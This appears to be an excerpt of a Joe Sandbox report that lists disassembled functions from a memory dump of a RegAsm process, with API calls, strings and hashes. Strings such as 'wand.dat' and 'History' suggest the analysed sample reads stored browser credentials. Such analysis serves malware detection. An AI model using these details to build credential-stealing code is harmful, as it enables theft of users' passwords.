                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                APIs
                                                                Strings
                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                • API String ID: 3510742995-272990098
                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpymemset
                                                                • String ID: gj
                                                                • API String ID: 1297977491-4203073231
                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                APIs
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                APIs
                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                • malloc.MSVCRT ref: 004174BD
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                • String ID:
                                                                • API String ID: 2903831945-0
                                                                • Opcode ID: 72a525d074bbf2b48926c36b1cc68c9f5366c1c2a2e3fb8c8570e31a3083a8d5
                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                • Opcode Fuzzy Hash: 72a525d074bbf2b48926c36b1cc68c9f5366c1c2a2e3fb8c8570e31a3083a8d5
                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                APIs
                                                                • GetParent.USER32(?), ref: 0040D453
                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Rect$ClientParentPoints
                                                                • String ID:
                                                                • API String ID: 4247780290-0
                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                • memset.MSVCRT ref: 004450CD
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                • String ID:
                                                                • API String ID: 1471605966-0
                                                                • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                APIs
                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                • wcscat.MSVCRT ref: 0044476E
                                                                • wcscat.MSVCRT ref: 0044477F
                                                                • wcscat.MSVCRT ref: 0044478E
                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                • String ID: \StringFileInfo\
                                                                • API String ID: 102104167-2245444037
                                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID:
                                                                • API String ID: 613200358-0
                                                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$??3@
                                                                • String ID: g4@
                                                                • API String ID: 3314356048-2133833424
                                                                • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _memicmpwcslen
                                                                • String ID: @@@@$History
                                                                • API String ID: 1872909662-685208920
                                                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                APIs
                                                                • memset.MSVCRT ref: 004100FB
                                                                • memset.MSVCRT ref: 00410112
                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                • String ID: </%s>
                                                                • API String ID: 3400436232-259020660
                                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                APIs
                                                                • memset.MSVCRT ref: 0040D58D
                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                • String ID: caption
                                                                • API String ID: 1523050162-4135340389
                                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                APIs
                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                • String ID: MS Sans Serif
                                                                • API String ID: 210187428-168460110
                                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memcmp
                                                                • String ID:
                                                                • API String ID: 3384217055-0
                                                                • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$memcpy
                                                                • String ID:
                                                                • API String ID: 368790112-0
                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                APIs
                                                                • memset.MSVCRT ref: 0040560C
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                • String ID: *.*$dat$wand.dat
                                                                • API String ID: 2618321458-1828844352
                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                APIs
                                                                • memset.MSVCRT ref: 00412057
                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                • String ID:
                                                                • API String ID: 3550944819-0
                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                APIs
                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                • memcpy.MSVCRT ref: 0040A94F
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                • String ID:
                                                                • API String ID: 3023356884-0
                                                                • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                APIs
                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                • memcpy.MSVCRT ref: 0040B248
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                • String ID:
                                                                • API String ID: 3023356884-0
                                                                • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: @
                                                                • API String ID: 3510742995-2766056989
                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                APIs
                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                • memcpy.MSVCRT ref: 0040B159
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                • String ID:
                                                                • API String ID: 1171893557-0
                                                                • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                APIs
                                                                • memset.MSVCRT ref: 004144E7
                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                • memset.MSVCRT ref: 0041451A
                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                • String ID:
                                                                • API String ID: 1127616056-0
                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                • malloc.MSVCRT ref: 00417459
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                • String ID:
                                                                • API String ID: 4284152360-0
                                                                • Opcode ID: eaca81c66f9b3873556ad57409b92193fe76b8735ccf14a8127ccb46f8d17a77
                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                • Opcode Fuzzy Hash: eaca81c66f9b3873556ad57409b92193fe76b8735ccf14a8127ccb46f8d17a77
                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                APIs
